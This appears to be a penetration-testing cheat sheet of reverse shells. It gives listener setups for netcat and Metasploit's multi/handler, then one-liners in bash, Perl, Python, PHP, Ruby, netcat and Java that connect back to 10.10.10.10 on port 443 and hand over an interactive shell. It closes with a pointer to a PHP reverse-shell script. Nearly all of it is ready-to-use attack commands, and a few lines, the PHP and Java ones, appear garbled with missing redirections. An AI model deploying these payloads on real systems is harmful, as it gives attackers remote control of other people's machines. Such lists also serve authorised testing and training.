Shells / Payloads

Universal listeners

# Netcat

[sudo] rlwrap nc -nvlp <port>

# msf multi/handler

msf(exploit/multi/handler)> set payload path/to/payload

msf(exploit/multi/handler)> set LHOST <ip> # or <interface>

msf(exploit/multi/handler)> set LPORT <port>

Linux

One-liners

# bash

/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.10.10/443 0>&1"

# Perl

perl -e 'use Socket;$i="10.10.10.10";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

# Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# PHP

php -r '$sock=fsockopen("10.10.10.10",443);exec("/bin/sh -i &3 2>&3");'

# Ruby

ruby -rsocket -e'f=TCPSocket.open("10.10.10.10",443).to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'

# Netcat : -u for UDP

nc [-u] 10.10.10.10 443 -e /bin/bash

# Netcat without -e : -u for UDP

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/bash -i 2>&1 | nc [-u] 10.10.10.10 443 > /tmp/f

# Java

r = Runtime.getRuntime()

p = r.exec(["/bin/bash","-c","exec 5/dev/tcp/10.10.10.10/443;cat &5 >&5; done"] as String[])

p.waitFor()

Reverse shell scripts

PHP reverse shell available here or locally

/usr/share/webshells/php/php-reverse-shell